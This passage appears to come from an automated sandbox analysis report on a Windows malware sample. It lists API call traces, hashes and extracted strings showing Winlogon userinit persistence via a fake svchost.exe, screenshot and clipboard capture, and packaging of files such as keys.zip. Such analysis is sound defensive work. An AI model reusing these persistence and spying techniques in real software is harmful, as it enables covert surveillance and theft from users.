                                                                                                                                                                                                              • Part of subcall function 02BBDF80: WindowFromPoint.USER32(76F930D0,?,?,02BBE016,?,02BBA857,?,76F930D0,?), ref: 02BBDFE8
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(00000000,?,02BBA857,?,02BBA857,?,76F930D0,?), ref: 02BBE037
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,?), ref: 02BBE05D
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBE081
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE092
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE09D
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE0BB
                                                                                                                                                                                                            • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 02BBE0C6
                                                                                                                                                                                                            • ReleaseMutex.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,02BBA857), ref: 02BBE0D2
                                                                                                                                                                                                            • GetAncestor.USER32(00000000,00000002), ref: 02BBE0E6
                                                                                                                                                                                                            • GetWindowInfo.USER32(?,?), ref: 02BBE129
                                                                                                                                                                                                            • PtInRect.USER32(?,?,02BBA857), ref: 02BBE154
                                                                                                                                                                                                            • GetWindowLongA.USER32(00000000,000000F0), ref: 02BBE174
                                                                                                                                                                                                            • SendMessageTimeoutA.USER32(00000000,00000084,00000000,02BBA857,00000002,00000064,000000FF), ref: 02BBE1A3
                                                                                                                                                                                                            • MapWindowPoints.USER32(00000000,?,00000000,00000001), ref: 02BBE1D0
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(?,00000000,?), ref: 02BBE1DB
                                                                                                                                                                                                            • MapWindowPoints.USER32(?,00000000,00000000,00000001), ref: 02BBE1F7
                                                                                                                                                                                                            • RealChildWindowFromPoint.USER32(00000000,00000000,?), ref: 02BBE202
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Window$Long$FromPoint$ChildReal$MessagePointsSendTimeout$AncestorDesktopInfoMutexObjectParentRectReleaseSingleVisibleWait
                                                                                                                                                                                                            • String ID: <
                                                                                                                                                                                                            • API String ID: 1846550538-4251816714
                                                                                                                                                                                                            • Opcode ID: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                            • Instruction ID: dd6f3879b824cae557e6583da18cae66bfe836aafebf5e7a629c8626d2205653
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f29a0fcb686f15f1f78a2644fc8910dde4f18d17753442432f82e1c17429a30a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2F61AE75A40209ABDB21CE58DC84EFE73A9EF84761F544659FE50A3294CBB0EC11CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80,?,753CBF00), ref: 02BD10F0
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,753CBF00), ref: 02BD1131
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,753CBF00), ref: 02BD113B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD1143
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD1154
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,753CBF00), ref: 02BD115B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02BD119A
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,753CBF00), ref: 02BD11A7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,753CBF00), ref: 02BD11F0
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,753CBF00), ref: 02BD120C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,753CBF00), ref: 02BD1229
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000008,00004070,76F90F00,00000000,76F92F00,?,02BC3CE8,?), ref: 02BD9793
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapAlloc.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9796
                                                                                                                                                                                                              • Part of subcall function 02BD9780: memset.MSVCRT ref: 02BD97AB
                                                                                                                                                                                                              • Part of subcall function 02BD9780: CreateFileA.KERNEL32(02BC3CE8,40000000,00000003,00000000,00000002,00000080,00000000,?,02BC3CE8,?), ref: 02BD9802
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9825
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapValidate.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9828
                                                                                                                                                                                                              • Part of subcall function 02BD9780: GetProcessHeap.KERNEL32(00000000,00000000,?,02BC3CE8,?), ref: 02BD9834
                                                                                                                                                                                                              • Part of subcall function 02BD9780: HeapFree.KERNEL32(00000000,?,02BC3CE8,?), ref: 02BD9837
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,753CBF00), ref: 02BD1258
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CA80,?,753CBF00), ref: 02BD1277
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,?,753CBF00), ref: 02BD12DB
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,?,753CBF00), ref: 02BD12E8
                                                                                                                                                                                                              • Part of subcall function 02BD9910: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,76F92F00), ref: 02BD9991
                                                                                                                                                                                                              • Part of subcall function 02BD9910: _snprintf.MSVCRT ref: 02BD99AD
                                                                                                                                                                                                              • Part of subcall function 02BD9910: FindFirstFileA.KERNEL32(00000000,?), ref: 02BD99BC
                                                                                                                                                                                                              • Part of subcall function 02BD9910: LocalFree.KERNEL32(00000000), ref: 02BD99C9
                                                                                                                                                                                                              • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A08
                                                                                                                                                                                                              • Part of subcall function 02BD9910: wsprintfA.USER32 ref: 02BD9A16
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                            • String ID: \$inter.zip$path.txt
                                                                                                                                                                                                            • API String ID: 3082343898-67432706
                                                                                                                                                                                                            • Opcode ID: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                            • Instruction ID: 23af6302e15f28dbf6c2c5b1f70058be5e5aadc89648a2471b07cf1a8891578c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1f228519e9ce739a249fb4622c1f1dc0bd30849bf9f2ed11b10f959ffc6bbd4f
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E61477094070A5FDB25CB789898BEB7BE8EF45340F4445D4EACDD7241EB71AA88CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0D098), ref: 02BD3920
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3961
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD396B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD3973
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD3984
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BD398B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 02BD39BF
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?), ref: 02BD39CC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BD3A10
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BD3A2C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BD3A49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                            • String ID: \$path.txt$stf.zip
                                                                                                                                                                                                            • API String ID: 3351314726-487659054
                                                                                                                                                                                                            • Opcode ID: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                            • Instruction ID: bacdf51a1bca5e723375b89948e123e0ca4badadaf01c31f2442603daf70966f
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 50d78aee7ed85f65595c3bef02fc9011bac002a1835ea2f3ab3dde42b6dad8fc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63612570A006595FDB25CB349898BEB7BE4EF45340F5445D4EACAD7242EB70A988CF90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0CE90,?,?,00000000), ref: 02BD2920
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000,?,?,00000000), ref: 02BD2961
                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,00000000), ref: 02BD296B
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BD2973
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD2984
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 02BD298B
                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD29BF
                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,?,00000000), ref: 02BD29CC
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?,?,?,00000000), ref: 02BD2A10
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,?,00000000), ref: 02BD2A2C
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104,?,?,00000000), ref: 02BD2A49
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: DirectoryErrorFileLastPath$AdminAllocAttributesBackslashCreateCurrentFolderMakeModuleNameSystemUserVirtuallstrcpyn
                                                                                                                                                                                                            • String ID: \$path.txt$rfk.zip
                                                                                                                                                                                                            • API String ID: 3351314726-233339579
                                                                                                                                                                                                            • Opcode ID: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                            • Instruction ID: 47628c43ae8e57af4e52fb445ac3493624071d6c6f7fd10827fe8323f503aee1
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 778e3f09270b10924505d1e57674a1718a89fee11edf5736d3a37cdb7b4da3af
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 656148309006995FDB358B349C98BFB7BE4EF45340F4445E4EAC9D7242EB70AA88CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetFileType.KERNEL32(?,00000000,00000000), ref: 02BD8899
                                                                                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02BD88B6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationType
                                                                                                                                                                                                            • String ID: ,D0<$,D0<$D0<$D0<
                                                                                                                                                                                                            • API String ID: 4064226416-1748840775
                                                                                                                                                                                                            • Opcode ID: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                            • Instruction ID: ca15629dbedd83c84a11be676ac98152bde204400b5730f0db2fd86f0de96b0e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a4200ef0cefc3e09faf2d22ff674bbb6a7309c0a3c363113b800d53ae3f09e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D518F71D40219ABEB24CFA4DC89BFEBB78FB44701F504569FA14EB180E774A941CB91
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC323D
                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 02BC325E
                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 02BC327F
                                                                                                                                                                                                            • GetGUIThreadInfo.USER32(00000000), ref: 02BC3286
                                                                                                                                                                                                            • GetOpenClipboardWindow.USER32 ref: 02BC329C
                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 02BC32AA
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(?,?,00000000,000000FF,?,?,?,?), ref: 02BC32D8
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000013), ref: 02BC32FA
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02BC3301
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BC3311
                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000), ref: 02BC332E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC337B
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BC337E
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC338B
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BC338E
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02BC3399
                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000,00000000,00000001), ref: 02BC33DF
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$GlobalProcess$ByteCharMultiThreadUnlockWideWindowmemset$ActiveAllocClipboardCurrentFreeInfoLockOpenValidate
                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                            • API String ID: 3472172748-4108050209
                                                                                                                                                                                                            • Opcode ID: 788504112fa3810a1e32d4a3e4edcd895b18b2a640364ca1f7faa2a921ade0b5
                                                                                                                                                                                                            • Instruction ID: 52f928dc8a451687a77e9397b1f0feac77296185b5650d944c9a35602381331c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 788504112fa3810a1e32d4a3e4edcd895b18b2a640364ca1f7faa2a921ade0b5
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FC41F231604312ABD7209F649C4CF6B7BE8EFC5754F648B9CFA94D7280DB20DA148BA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BCB1F0
                                                                                                                                                                                                              • Part of subcall function 02BCB110: PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB137
                                                                                                                                                                                                              • Part of subcall function 02BCB110: GetFileAttributesA.KERNEL32(?), ref: 02BCB175
                                                                                                                                                                                                              • Part of subcall function 02BCB110: PathFileExistsA.SHLWAPI(?), ref: 02BCB1B9
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB238
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02BCB2A0
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCB2AD
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058,?,?), ref: 02BCB2E7
                                                                                                                                                                                                            • SetCurrentDirectoryA.KERNEL32(?), ref: 02BCB36A
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004), ref: 02BCB37E
                                                                                                                                                                                                            • lstrcpynA.KERNEL32(00000000,?,00000104), ref: 02BCB391
                                                                                                                                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000), ref: 02BCB3C0
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C058), ref: 02BCB3CB
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3EE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BCB3F1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 02BCB3FE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BCB401
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Path$BackslashFileHeap$AttributesFreeProcessVirtual$AllocCurrentDeleteDirectoryExistsValidatelstrcpynmemset
                                                                                                                                                                                                            • String ID: 5NT$keys.zip$path.txt
                                                                                                                                                                                                            • API String ID: 2685098104-541280351
                                                                                                                                                                                                            • Opcode ID: fe349899d7ac646c63f3a48a52f2b0f123f44e7277c9b46d8c9c054436f23160
                                                                                                                                                                                                            • Instruction ID: 900c11c1b4498eb715a66454ce6496371e5f9c365f5fa493206f73847911ce43
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fe349899d7ac646c63f3a48a52f2b0f123f44e7277c9b46d8c9c054436f23160
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 465138709407495FDB218B389899FEF7FE8EF45348F2486D8EA85DB241DB719848CB90
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(G,@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401177
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401193
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011B3
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 004011BA
                                                                                                                                                                                                            • memset.MSVCRT ref: 004011CD
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401B44), ref: 004011EA
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401B44), ref: 004011FA
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401B44), ref: 00401209
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00401B44,00000000,?,00000000,?,?,?,00401B44), ref: 0040121C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401231
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 00401234
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401241
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00401244
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,00401B44,00000000,00000000), ref: 00401264
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,00401B44,00000000,00000000), ref: 00401275
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,00000000,?,00000000,?,?,?,00401B44,00000000,00000000,?,00000000,00402C47), ref: 00401285
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$Handle$AllocCloseCreateFreeInformationLockPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID: G,@
                                                                                                                                                                                                            • API String ID: 132362422-3313068137
                                                                                                                                                                                                            • Opcode ID: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction ID: a7140257f329b7de85cf1082c2828f4b6f45ca3281c26892c76bebf1ae027e6a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: c87fe8c59a66a8ba2057550360fc396b9d9c5c1a7bae7684166c86d3e9f90a93
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2C4167B1A00214BBEB109F959D89FAFBB7CEF84B11F10416AFB05F62D0D77459448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(C:\Windows\apppatch\svchost.exe,76F930D0,00000000), ref: 02BD4A43
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000103,?,76DC0180), ref: 02BD4A6D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4A8D
                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,userinit,00000000,00000000,00000000,00000000), ref: 02BD4ABA
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,C:\Windows\apppatch\svchost.exe), ref: 02BD4ABE
                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,userinit,00000000,00000001,00000000,00000002), ref: 02BD4B60
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000,6F9890B0,02BC0C69), ref: 02BC41BE
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: HeapValidate.KERNEL32(00000000), ref: 02BC41C1
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BC41CE
                                                                                                                                                                                                              • Part of subcall function 02BC41B0: HeapFree.KERNEL32(00000000), ref: 02BC41D1
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02BD4B71
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 02BD4B7B
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Value$ProcessQuery$CloseExistsFileFlushFreeOpenPathValidate
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 579956326-2103896814
                                                                                                                                                                                                            • Opcode ID: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                            • Instruction ID: fe181f4181763507234f3d90ad90dc1570fb569b6feec572c21d97e65abb377d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3651270a5cdb388e740aaadcc920aa9d146eab14830f736625838180e8695a9b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4D512935600306FFEB208B649C98FFABBB9EF84744F1045C4FA46AB204E7719A19C790
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(02C0C670), ref: 02BCF2F7
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF33B
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF347
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF34B
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF35C
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF363
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BCF390
                                                                                                                                                                                                            • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BCF39F
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BCF3A5
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BCF3A9
                                                                                                                                                                                                            • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BCF3BA
                                                                                                                                                                                                            • SetLastError.KERNEL32(00000000), ref: 02BCF3C1
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BCF3EF
                                                                                                                                                                                                            • Sleep.KERNEL32(00000FA0,?), ref: 02BCF405
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorLastPath$AdminBackslashCreateDirectoryFolderMakeSystemUser$Sleep_snprintf
                                                                                                                                                                                                            • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                            • API String ID: 1455050916-1670482240
                                                                                                                                                                                                            • Opcode ID: afc4346d664de6e07168b8e66440c3dd2b925e1932cc9160a97851c67049ffdd
                                                                                                                                                                                                            • Instruction ID: cdfff29c576b3314fc9af61887cf14929964b5a0856a5c98428e9c4dd98ea997
                                                                                                                                                                                                            • Opcode Fuzzy Hash: afc4346d664de6e07168b8e66440c3dd2b925e1932cc9160a97851c67049ffdd
